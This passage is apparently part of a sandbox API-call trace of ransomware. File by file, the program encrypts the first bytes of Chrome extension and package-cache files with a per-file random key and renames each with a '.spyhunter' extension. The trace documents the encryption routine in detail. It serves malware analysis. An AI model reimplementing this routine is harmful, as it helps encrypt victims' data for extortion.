lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf21c*=0x30, lpOverlapped=0x0) returned 1 [0137.441] CloseHandle (hObject=0x178) returned 1 [0137.441] GetProcessHeap () returned 0x2c0000 [0137.441] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0137.441] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.spyhunter") returned 133 [0137.441] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\cab1.cab"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.spyhunter" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\cab1.cab.spyhunter")) returned 1 [0137.442] GetProcessHeap () returned 0x2c0000 [0137.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0137.442] GetProcessHeap () returned 0x2c0000 [0137.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0137.442] GetProcessHeap () returned 0x2c0000 [0137.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e3c630 | out: hHeap=0x2c0000) returned 1 [0137.504] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf258 | out: pbBuffer=0x25cf258) returned 1 [0137.505] GetProcessHeap () returned 0x2c0000 [0137.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0137.505] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25cf250*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25cf250*=0x30) returned 1 [0137.505] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0137.505] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js") returned 148 [0137.505] StrStrW (lpFirst="craw_window.js", lpSrch=".txt") returned 0x0 [0137.505] GetProcessHeap () returned 0x2c0000 [0137.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0137.506] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf214, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf214*=0x2800, lpOverlapped=0x0) returned 1 [0137.527] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.527] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf214, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf214*=0x2800, lpOverlapped=0x0) returned 1 [0137.528] GetProcessHeap () returned 0x2c0000 [0137.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0137.528] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.528] WriteFile (in: hFile=0xec, lpBuffer=0x25cf254*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf214, lpOverlapped=0x0 | out: lpBuffer=0x25cf254*, lpNumberOfBytesWritten=0x25cf214*=0x4, lpOverlapped=0x0) returned 1 [0137.538] WriteFile (in: hFile=0xec, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf214, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25cf214*=0x30, lpOverlapped=0x0) returned 1 [0137.538] CloseHandle (hObject=0xec) returned 1 [0137.538] GetProcessHeap () returned 0x2c0000 [0137.538] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0137.538] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js.spyhunter") returned 158 [0137.538] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js.spyhunter")) returned 1 [0137.539] GetProcessHeap () returned 0x2c0000 [0137.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0137.540] GetProcessHeap () returned 0x2c0000 [0137.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0137.540] GetProcessHeap () returned 0x2c0000 [0137.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d0f3f8 | out: hHeap=0x2c0000) returned 1 [0137.541] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf250 | out: pbBuffer=0x25cf250) returned 1 [0137.541] GetProcessHeap () returned 0x2c0000 [0137.541] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0137.541] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25cf248*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25cf248*=0x30) returned 1 [0137.542] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0137.542] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json") returned 159 [0137.542] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0137.542] GetProcessHeap () returned 0x2c0000 [0137.542] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0137.542] ReadFile (in: hFile=0xec, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf20c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf20c*=0x2bd, lpOverlapped=0x0) returned 1 [0137.551] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xfffffd43, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.552] WriteFile (in: hFile=0xec, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2bd, lpNumberOfBytesWritten=0x25cf20c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf20c*=0x2bd, lpOverlapped=0x0) returned 1 [0137.552] GetProcessHeap () returned 0x2c0000 [0137.552] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0137.552] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.552] WriteFile (in: hFile=0xec, lpBuffer=0x25cf24c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf20c, lpOverlapped=0x0 | out: lpBuffer=0x25cf24c*, lpNumberOfBytesWritten=0x25cf20c*=0x4, lpOverlapped=0x0) returned 1 [0137.552] WriteFile (in: hFile=0xec, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf20c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25cf20c*=0x30, lpOverlapped=0x0) returned 1 [0137.552] CloseHandle (hObject=0xec) returned 1 [0137.552] GetProcessHeap () returned 0x2c0000 [0137.553] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0137.553] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json.spyhunter") returned 169 [0137.553] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json.spyhunter")) returned 1 [0137.554] GetProcessHeap () returned 0x2c0000 [0137.554] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0137.554] GetProcessHeap () returned 0x2c0000 [0137.554] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0137.554] GetProcessHeap () returned 0x2c0000 [0137.554] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f804f8 | out: hHeap=0x2c0000) returned 1 [0137.556] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf248 | out: pbBuffer=0x25cf248) returned 1 [0137.556] GetProcessHeap () returned 0x2c0000 [0137.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0137.556] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25cf240*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25cf240*=0x30) returned 1 [0137.556] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0137.557] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json") returned 159 [0137.557] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0137.557] GetProcessHeap () returned 0x2c0000 [0137.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0137.557] ReadFile (in: hFile=0xec, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf204, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf204*=0x2b8, lpOverlapped=0x0) returned 1 [0137.732] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xfffffd48, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.732] WriteFile (in: hFile=0xec, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2b8, lpNumberOfBytesWritten=0x25cf204, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf204*=0x2b8, lpOverlapped=0x0) returned 1 [0137.747] GetProcessHeap () returned 0x2c0000 [0137.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0137.747] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.747] WriteFile (in: hFile=0xec, lpBuffer=0x25cf244*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf204, lpOverlapped=0x0 | out: lpBuffer=0x25cf244*, lpNumberOfBytesWritten=0x25cf204*=0x4, lpOverlapped=0x0) returned 1 [0137.748] WriteFile (in: hFile=0xec, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf204, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25cf204*=0x30, lpOverlapped=0x0) returned 1 [0137.748] CloseHandle (hObject=0xec) returned 1 [0137.748] GetProcessHeap () returned 0x2c0000 [0137.748] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0137.748] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json.spyhunter") returned 169 [0137.748] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json.spyhunter")) returned 1 [0137.749] GetProcessHeap () returned 0x2c0000 [0137.749] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0137.749] GetProcessHeap () returned 0x2c0000 [0137.749] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0137.749] GetProcessHeap () returned 0x2c0000 [0137.749] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f80808 | out: hHeap=0x2c0000) returned 1 [0137.750] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf240 | out: pbBuffer=0x25cf240) returned 1 [0137.750] GetProcessHeap () returned 0x2c0000 [0137.750] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0137.750] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25cf238*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25cf238*=0x30) returned 1 [0137.750] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0137.751] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json") returned 155 [0137.752] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0137.752] GetProcessHeap () returned 0x2c0000 [0137.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0137.752] ReadFile (in: hFile=0xec, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf1fc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf1fc*=0xd2, lpOverlapped=0x0) returned 1 [0137.752] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffff2e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.752] WriteFile (in: hFile=0xec, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xd2, lpNumberOfBytesWritten=0x25cf1fc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf1fc*=0xd2, lpOverlapped=0x0) returned 1 [0137.753] GetProcessHeap () returned 0x2c0000 [0137.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0137.753] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.753] WriteFile (in: hFile=0xec, lpBuffer=0x25cf23c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf1fc, lpOverlapped=0x0 | out: lpBuffer=0x25cf23c*, lpNumberOfBytesWritten=0x25cf1fc*=0x4, lpOverlapped=0x0) returned 1 [0137.753] WriteFile (in: hFile=0xec, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf1fc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25cf1fc*=0x30, lpOverlapped=0x0) returned 1 [0137.753] CloseHandle (hObject=0xec) returned 1 [0137.753] GetProcessHeap () returned 0x2c0000 [0137.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0137.753] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json.spyhunter") returned 165 [0137.753] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json.spyhunter")) returned 1 [0137.754] GetProcessHeap () returned 0x2c0000 [0137.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0137.754] GetProcessHeap () returned 0x2c0000 [0137.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0137.754] GetProcessHeap () returned 0x2c0000 [0137.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1f9e0 | out: hHeap=0x2c0000) returned 1 [0137.755] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf238 | out: pbBuffer=0x25cf238) returned 1 [0137.755] GetProcessHeap () returned 0x2c0000 [0137.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0137.755] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25cf230*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25cf230*=0x30) returned 1 [0137.755] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0137.756] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json") returned 155 [0137.756] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0137.756] GetProcessHeap () returned 0x2c0000 [0137.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0137.756] ReadFile (in: hFile=0xec, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf1f4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf1f4*=0xe8, lpOverlapped=0x0) returned 1 [0137.757] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffff18, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.757] WriteFile (in: hFile=0xec, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x25cf1f4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf1f4*=0xe8, lpOverlapped=0x0) returned 1 [0137.758] GetProcessHeap () returned 0x2c0000 [0137.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0137.758] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.758] WriteFile (in: hFile=0xec, lpBuffer=0x25cf234*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf1f4, lpOverlapped=0x0 | out: lpBuffer=0x25cf234*, lpNumberOfBytesWritten=0x25cf1f4*=0x4, lpOverlapped=0x0) returned 1 [0137.758] WriteFile (in: hFile=0xec, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf1f4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25cf1f4*=0x30, lpOverlapped=0x0) returned 1 [0137.758] CloseHandle (hObject=0xec) returned 1 [0137.758] GetProcessHeap () returned 0x2c0000 [0137.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0137.758] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json.spyhunter") returned 165 [0137.758] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json.spyhunter")) returned 1 [0137.759] GetProcessHeap () returned 0x2c0000 [0137.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 